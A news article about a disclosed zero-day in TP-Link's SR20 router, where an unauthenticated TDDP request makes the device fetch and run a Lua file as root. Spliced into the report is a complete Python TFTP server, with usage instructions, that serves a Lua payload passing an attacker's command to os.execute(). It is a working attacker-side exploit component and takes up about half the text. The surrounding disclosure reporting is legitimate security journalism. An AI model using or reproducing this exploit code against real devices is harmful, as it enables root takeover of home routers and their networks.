TP-Link’s SR20 Smart Home Router is affected by a zero-day arbitrary code execution (ACE) vulnerability that lets attackers on the same local network run arbitrary commands as root, as disclosed on Twitter by Google security developer Matthew Garrett.
Garrett disclosed the 0-day after TP-Link failed to respond within the 90 days since his report. As he explained in the Twitter thread, the flaw stems from the fact that “TP-Link routers frequently run a process called ‘tddp’ (TP-Link Device Debug Protocol) as root”, a daemon that has previously been found to contain multiple other vulnerabilities [1, 2].
TDDP allows running two types of commands on the device: type 1, which do not require authentication, and type 2, which require administrator credentials.
It’s been over 90 days since I reported it and @TPLINK never responded, so: arbitrary command execution on the TP-Link SR20 smart hub and router (and possibly other TP-Link devices)
— Matthew Garrett (@mjg59) March 28, 2019
Zero-day allows attackers to execute arbitrary code as root
As detailed by Garrett, the vulnerable router exposes a number of type 1 commands. One of them, command 0x1f with request 0x01, “appears to be for some sort of configuration validation,” and accepts a payload made of a filename, a semicolon, and an argument; sending such a request is the first step of the exploitation chain.
That request instructs the router to connect back over Trivial File Transfer Protocol (TFTP) to the machine that sent it. The SR20 then “requests the filename via TFTP, imports it into a LUA interpreter and passes the argument to the config_test() function in the file it just imported. The interpreter is running as root.”
Because Lua’s os.execute() method hands its string straight to the command shell, an unauthenticated attacker can run any command as root, which amounts to a full takeover of the compromised SR20.
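As an added illustration (not Garrett’s PoC and not any TP-Link code), the Python below implements the attacker-side half of the chain described above: a minimal stop-and-wait TFTP read server (RFC 1350) that hands the router a Lua file whose config_test() passes its argument to os.execute(). The filename poc.lua, the octet transfer mode and the constructed Lua payload are assumptions; the TDDP request itself is not reproduced here because its byte layout is not given in the article.

```python
import socket
import struct

# Constructed payload: the shape of the Lua file the article describes.
# The router's interpreter (running as root) loads this file and calls
# config_test(<argument from the TDDP request>); os.execute() hands that
# string to the shell.
LUA_PAYLOAD = b"""function config_test(arg)
  os.execute(arg)
end
"""

OP_RRQ, OP_DATA, OP_ACK, OP_ERROR = 1, 3, 4, 5
BLOCK = 512  # RFC 1350 data block size


def parse_rrq(pkt):
    """Return (filename, mode) for a TFTP read request, or None if pkt is not an RRQ."""
    if len(pkt) < 4 or struct.unpack("!H", pkt[:2])[0] != OP_RRQ:
        return None
    parts = pkt[2:].split(b"\x00")
    if len(parts) < 2 or not parts[0]:
        return None
    return parts[0].decode("latin-1"), parts[1].decode("latin-1").lower()


def data_blocks(payload):
    """Split payload into DATA packets; the transfer ends on a block shorter than 512 bytes."""
    blocks, n = [], 1
    for off in range(0, len(payload), BLOCK):
        blocks.append(struct.pack("!HH", OP_DATA, n) + payload[off:off + BLOCK])
        n += 1
    if len(payload) % BLOCK == 0:  # exact multiple (or empty): send an empty final block
        blocks.append(struct.pack("!HH", OP_DATA, n))
    return blocks


def parse_ack(pkt):
    """Return the acknowledged block number, or None if pkt is not an ACK."""
    if len(pkt) != 4 or struct.unpack("!H", pkt[:2])[0] != OP_ACK:
        return None
    return struct.unpack("!H", pkt[2:4])[0]


def serve_once(files, bind=("0.0.0.0", 69), timeout=5.0):
    """Answer a single RRQ from files[filename]; returns the number of payload bytes sent."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    srv.bind(bind)  # port 69 needs root on most systems
    srv.settimeout(timeout)
    try:
        pkt, peer = srv.recvfrom(1024)
        req = parse_rrq(pkt)
        if req is None or req[0] not in files:
            srv.sendto(struct.pack("!HH", OP_ERROR, 1) + b"File not found\x00", peer)
            return 0
        sent = 0
        # RFC 1350: the server answers from a fresh port, its transfer ID.
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as xfer:
            xfer.settimeout(timeout)
            for blk in data_blocks(files[req[0]]):
                expect = struct.unpack("!H", blk[2:4])[0]
                for _ in range(3):  # retransmit until the client ACKs this block
                    xfer.sendto(blk, peer)
                    try:
                        ack, _ = xfer.recvfrom(1024)
                    except socket.timeout:
                        continue
                    if parse_ack(ack) == expect:
                        break
                else:
                    raise TimeoutError("no ACK for block %d" % expect)
                sent += len(blk) - 4
        return sent
    finally:
        srv.close()


if __name__ == "__main__":
    # Usage (as root): run this, then send the TDDP request naming "poc.lua"
    # and the command to execute; the router fetches poc.lua from this host.
    print("served %d bytes" % serve_once({"poc.lua": LUA_PAYLOAD}))
```

The server is deliberately single-shot and stop-and-wait: the router issues one RRQ, and each DATA block is retransmitted up to three times until acknowledged, so a dropped ACK does not abort the transfer.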
Proof-of-concept also available
The tddp daemon listens on all interfaces, but the default firewall rules the SR20 ships with block attackers from exploiting the zero-day from outside the local area network (LAN) the device is part of.
Garrett concludes by saying that TP-Link should “stop shipping debug daemons on production firmware and if you’re going to have a webform to submit security issues then have someone actually respond to it.”
The Google developer also wrote a proof-of-concept (PoC), which he published at the time the zero-day was disclosed.
The last firmware update issued for the SR20 Smart Home Router is from June 2018 and it removed WPS from the router’s WEB UI, fixed bugs on some Smart Actions, and added support for a number of TP-Link Smart Wifi devices.
BleepingComputer has reached out to TP-Link for more details but did not receive an answer prior to publication.